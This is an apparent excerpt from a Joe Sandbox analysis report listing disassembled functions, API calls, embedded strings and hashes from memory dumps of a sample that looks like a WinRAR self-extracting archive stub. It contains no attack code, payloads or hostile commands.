                                                                                                  • Instruction Fuzzy Hash: 131106B270A3187BE2216B709C4AFEF765CAF84751F018124FA51E20D1DBA48F8956B5
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 00929705
                                                                                                    • Part of subcall function 00928DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?), ref: 00928DE2
                                                                                                    • Part of subcall function 00928DCC: GetLastError.KERNEL32(?,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?,?), ref: 00928DF4
                                                                                                  • _free.LIBCMT ref: 00929711
                                                                                                  • _free.LIBCMT ref: 0092971C
                                                                                                  • _free.LIBCMT ref: 00929727
                                                                                                  • _free.LIBCMT ref: 00929732
                                                                                                  • _free.LIBCMT ref: 0092973D
                                                                                                  • _free.LIBCMT ref: 00929748
                                                                                                  • _free.LIBCMT ref: 00929753
                                                                                                  • _free.LIBCMT ref: 0092975E
                                                                                                  • _free.LIBCMT ref: 0092976C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: 2510855600809939dba548b4cd3497b26337c9ea76378d8bba4b9bbb310dda13
                                                                                                  • Instruction ID: c7f5468ad535f16c6c4a455a7cf30af762b2c5bce077393eeedf2aaf14b8d3c0
                                                                                                  • Opcode Fuzzy Hash: 2510855600809939dba548b4cd3497b26337c9ea76378d8bba4b9bbb310dda13
                                                                                                  • Instruction Fuzzy Hash: 64110436101119BFDB01EF54E846EDA3BB9EF54350F0058A0FA088F2B6DE32DA549B84
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                  • String ID: csm$csm$csm
                                                                                                  • API String ID: 322700389-393685449
                                                                                                  • Opcode ID: 7c5a4fb8cda7ec69a1bc747a460815058493fa4715ff934789b0c3d5296d279f
                                                                                                  • Instruction ID: c0ea30f57443745f013a61c372f4ee736173e3a8302ffc34e7c0692a0d08864e
                                                                                                  • Opcode Fuzzy Hash: 7c5a4fb8cda7ec69a1bc747a460815058493fa4715ff934789b0c3d5296d279f
                                                                                                  • Instruction Fuzzy Hash: B1B1AF71800229EFCF25DFA4E941AAEBBB9FF44310F148159F8016B25AD739DA61CF91
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 00906FAA
                                                                                                  • _wcslen.LIBCMT ref: 00907013
                                                                                                  • _wcslen.LIBCMT ref: 00907084
                                                                                                    • Part of subcall function 00907A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00907AAB
                                                                                                    • Part of subcall function 00907A9C: GetLastError.KERNEL32 ref: 00907AF1
                                                                                                    • Part of subcall function 00907A9C: CloseHandle.KERNEL32(?), ref: 00907B00
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                  • API String ID: 3122303884-3508440684
                                                                                                  • Opcode ID: ac0f227fc071fa370e144713367f121ea548080862b44783d4e80c6c01d9d09a
                                                                                                  • Instruction ID: 194c8aaf5ac25a6c545c97c8df18eaa485caeafddd872fe4fd5ed874bf188dab
                                                                                                  • Opcode Fuzzy Hash: ac0f227fc071fa370e144713367f121ea548080862b44783d4e80c6c01d9d09a
                                                                                                  • Instruction Fuzzy Hash: 1241E6B1D08344BEEB20E7B49C82FEEB76C9F84324F004555FA55A61C2D674BA888B61
                                                                                                  APIs
                                                                                                    • Part of subcall function 00901316: GetDlgItem.USER32(00000000,00003021), ref: 0090135A
                                                                                                    • Part of subcall function 00901316: SetWindowTextW.USER32(00000000,009335F4), ref: 00901370
                                                                                                  • EndDialog.USER32(?,00000001), ref: 0091B610
                                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0091B637
                                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0091B650
                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0091B661
                                                                                                  • GetDlgItem.USER32(?,00000065), ref: 0091B66A
                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0091B67E
                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0091B694
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                  • String ID: LICENSEDLG
                                                                                                  • API String ID: 3214253823-2177901306
                                                                                                  • Opcode ID: a86b4856583affc7eb32783675b90846c5e5cc46834373724e88279ce192084b
                                                                                                  • Instruction ID: 970d22f769ceb5b8b81b42f2d56cfec65aff166a4cf1ef378fdcb54a1ab33386
                                                                                                  • Opcode Fuzzy Hash: a86b4856583affc7eb32783675b90846c5e5cc46834373724e88279ce192084b
                                                                                                  • Instruction Fuzzy Hash: 6E21F93172C208BBD2115F76ED49FBB3B6EEB57BA1F014018F641D10A0CB969941B731
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,5F585B47,00000001,00000000,00000000,?,?,0090AF6C,ROOT\CIMV2), ref: 0091FD99
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0090AF6C,ROOT\CIMV2), ref: 0091FE14
                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0091FE1F
                                                                                                  • _com_issue_error.COMSUPP ref: 0091FE48
                                                                                                  • _com_issue_error.COMSUPP ref: 0091FE52
                                                                                                  • GetLastError.KERNEL32(80070057,5F585B47,00000001,00000000,00000000,?,?,0090AF6C,ROOT\CIMV2), ref: 0091FE57
                                                                                                  • _com_issue_error.COMSUPP ref: 0091FE6A
                                                                                                  • GetLastError.KERNEL32(00000000,?,?,0090AF6C,ROOT\CIMV2), ref: 0091FE80
                                                                                                  • _com_issue_error.COMSUPP ref: 0091FE93
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                  • String ID:
                                                                                                  • API String ID: 1353541977-0
                                                                                                  • Opcode ID: a4f201209b4e6cd6eea139fc87d5be9327e04af0df4d2ebf72be354debc8209e
                                                                                                  • Instruction ID: 139a1aa6baeeef173c4bb610c6fb22ee5dc897fa4de98f4395984d36fc5fd73f
                                                                                                  • Opcode Fuzzy Hash: a4f201209b4e6cd6eea139fc87d5be9327e04af0df4d2ebf72be354debc8209e
                                                                                                  • Instruction Fuzzy Hash: F2410A75B0021DABD710DF64DC55BEFBBA8EB84710F108239F909E7291D73499808BE0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                  • API String ID: 3519838083-3505469590
                                                                                                  • Opcode ID: 229550acf5c0efb8b68e0c81d192c86be1507b0d9622f21e3d33c327f8285247
                                                                                                  • Instruction ID: c39e731134d23da0cd96513f4cde2d33929be61f05c6470a454588f4b75eb213
                                                                                                  • Opcode Fuzzy Hash: 229550acf5c0efb8b68e0c81d192c86be1507b0d9622f21e3d33c327f8285247
                                                                                                  • Instruction Fuzzy Hash: 2F715A71A00219AFDB14DFA4CC95AAFB7B9FF88714B14455DE512A72A0CB30AE41DF60
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 00909387
                                                                                                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 009093AA
                                                                                                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 009093C9
                                                                                                    • Part of subcall function 0090C29A: _wcslen.LIBCMT ref: 0090C2A2
                                                                                                    • Part of subcall function 00911FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0090C116,00000000,.exe,?,?,00000800,?,?,?,00918E3C), ref: 00911FD1
                                                                                                  • _swprintf.LIBCMT ref: 00909465
                                                                                                    • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 009094D4
                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00909514
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
• String ID: rtmp%d
• API String ID: 3726343395-3303766350
• Opcode ID: bcb72d43cd9d3c4cbbaa84be61487cb36d4df526a69a4d0f28f20b3e887b8d66
• Instruction ID: b7f7bb2126d2d39f4c0afa2919079991f13c2657f3a96edde39f41bed9c6c687
• Opcode Fuzzy Hash: bcb72d43cd9d3c4cbbaa84be61487cb36d4df526a69a4d0f28f20b3e887b8d66
• Instruction Fuzzy Hash: 8A4154B19042596EDF21AB61CC45FDE737CAF85344F0048A5BA49E3092DB388BC9DF60
APIs
• __aulldiv.LIBCMT ref: 0091122E
  • Part of subcall function 0090B146: GetVersionExW.KERNEL32(?), ref: 0090B16B
• FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00911251
• FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00911263
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00911274
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00911284
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00911294
• FileTimeToSystemTime.KERNEL32(?,?,?), ref: 009112CF
• __aullrem.LIBCMT ref: 00911379
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
• String ID:
• API String ID: 1247370737-0
• Opcode ID: 7101a72946e90196454d2647a166ed48bb6b305df3a18d2cdfe02c0c74c0af26
• Instruction ID: 8d30b11147bd1f3e74b72918472cedda55c5daff2324fb9762e811e10f45dce7
• Opcode Fuzzy Hash: 7101a72946e90196454d2647a166ed48bb6b305df3a18d2cdfe02c0c74c0af26
• Instruction Fuzzy Hash: A041F8B1548309AFC714DF65C8849ABBBE9FF88314F00892EF596C2650E738E649DF51
APIs
• _swprintf.LIBCMT ref: 00902536
  • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
  • Part of subcall function 009105DA: _wcslen.LIBCMT ref: 009105E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: __vswprintf_c_l_swprintf_wcslen
• String ID: ;%u$x%u$xc%u
• API String ID: 3053425827-2277559157
• Opcode ID: 952fa24c76272a0b9d6a3dc2f30fbdd618d37270f1d6ae01faff1c67d6c788ef
• Instruction ID: b85d35a7b3fe0ea840d827f7a0f8df19ae2d4b264e2da54869766a40b9df9e19
• Opcode Fuzzy Hash: 952fa24c76272a0b9d6a3dc2f30fbdd618d37270f1d6ae01faff1c67d6c788ef
• Instruction Fuzzy Hash: 60F1D5B16043409FDB25DB28C499BFE779A5FD4300F084A69FDCA9B2C3CB649949C762
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: _wcslen
• String ID: </p>$</style>$<br>$<style>$>
• API String ID: 176396367-3568243669
• Opcode ID: 1dcbd5a883e39e3912cd0fb426f3953d1c8166d6195513a7949e4a1682d13b20
• Instruction ID: b9366d3a0abbc01191d86e5f0666863c0c02125f9e9a3e0b8310c605c62434cc
• Opcode Fuzzy Hash: 1dcbd5a883e39e3912cd0fb426f3953d1c8166d6195513a7949e4a1682d13b20
• Instruction Fuzzy Hash: 42510B6A74032B95DB349A25EC327F673E9DFA1750F69041AFDC18B2C0FB658DC18261
APIs
• GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0092FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0092F6CF
• __fassign.LIBCMT ref: 0092F74A
• __fassign.LIBCMT ref: 0092F765
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0092F78B
• WriteFile.KERNEL32(?,00000000,00000000,0092FE02,00000000,?,?,?,?,?,?,?,?,?,0092FE02,00000000), ref: 0092F7AA
• WriteFile.KERNEL32(?,00000000,00000001,0092FE02,00000000,?,?,?,?,?,?,?,?,?,0092FE02,00000000), ref: 0092F7E3
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 7ed9157781fd0779bdc846aa8d343a926585f3499faa2ec924e53553097d3cff
• Instruction ID: 5293531efb052fc7dee721015048d5f49bce42c7010ef64e5979016baef253dd
• Opcode Fuzzy Hash: 7ed9157781fd0779bdc846aa8d343a926585f3499faa2ec924e53553097d3cff
• Instruction Fuzzy Hash: 635194B1D042599FCB14CFA8EC55AEEFBF8EF09300F14416AE556E7255E670A940CBA0
APIs
• _ValidateLocalCookies.LIBCMT ref: 00922937
• ___except_validate_context_record.LIBVCRUNTIME ref: 0092293F
• _ValidateLocalCookies.LIBCMT ref: 009229C8
• __IsNonwritableInCurrentImage.LIBCMT ref: 009229F3
• _ValidateLocalCookies.LIBCMT ref: 00922A48
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: a8e575f73a213e1d75dc6a96136c370f865877d03139df4df213c38cc55db0c9
• Instruction ID: 7af7e1dc26f956c3398e0a76dc5ba03ac4c10cacdee55f8eff8ef65d7b6a9da8
• Opcode Fuzzy Hash: a8e575f73a213e1d75dc6a96136c370f865877d03139df4df213c38cc55db0c9
• Instruction Fuzzy Hash: 9B41B334A00228BFCF10EF68D885A9EBBF5EF85324F148065E815AB396D735DA45CF91
APIs
• ShowWindow.USER32(?,00000000), ref: 00919EEE
• GetWindowRect.USER32(?,00000000), ref: 00919F44
• ShowWindow.USER32(?,00000005,00000000), ref: 00919FDB
• SetWindowTextW.USER32(?,00000000), ref: 00919FE3
• ShowWindow.USER32(00000000,00000005), ref: 00919FF9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: Window$Show$RectText
• String ID: RarHtmlClassName
• API String ID: 3937224194-1658105358
• Opcode ID: d4bacae031ee0a0a418614ea14686db5be921e3641508fcce7b81282d19c0f46
• Instruction ID: 27b8b71b8ea80af621d99c62c608737bcfe56ab938da4a4fd05241488cddd272
• Opcode Fuzzy Hash: d4bacae031ee0a0a418614ea14686db5be921e3641508fcce7b81282d19c0f46
• Instruction Fuzzy Hash: 0241023120C218BFCB215F64DC48BABBBA8FF4A741F018518F84999156CB74DE49DB65
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: _wcslen
• String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
• API String ID: 176396367-3743748572
• Opcode ID: 140ac53adfad2d3e85d05bd3322625f620ab5e84f97c71b31f92013a4fde7ef7
• Instruction ID: d4064aeb57cde6dcbdf4b44c083aca2bfa71eee9e4b24282630f8f9ac5c9a799
• Opcode Fuzzy Hash: 140ac53adfad2d3e85d05bd3322625f620ab5e84f97c71b31f92013a4fde7ef7
• Instruction Fuzzy Hash: 78313E3274435956DA30AF54AC52BF673A8EFD0720F60841EF48657280FA54BEC983A1
APIs
  • Part of subcall function 0092C868: _free.LIBCMT ref: 0092C891
• _free.LIBCMT ref: 0092C8F2
  • Part of subcall function 00928DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?), ref: 00928DE2
  • Part of subcall function 00928DCC: GetLastError.KERNEL32(?,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?,?), ref: 00928DF4
• _free.LIBCMT ref: 0092C8FD
• _free.LIBCMT ref: 0092C908
• _free.LIBCMT ref: 0092C95C
• _free.LIBCMT ref: 0092C967
• _free.LIBCMT ref: 0092C972
• _free.LIBCMT ref: 0092C97D
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
• Instruction ID: 3c0dfb6138e91cd9f92a1f2b68651aced76e0d28f0af1a4cdb420da0f5409db6
• Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
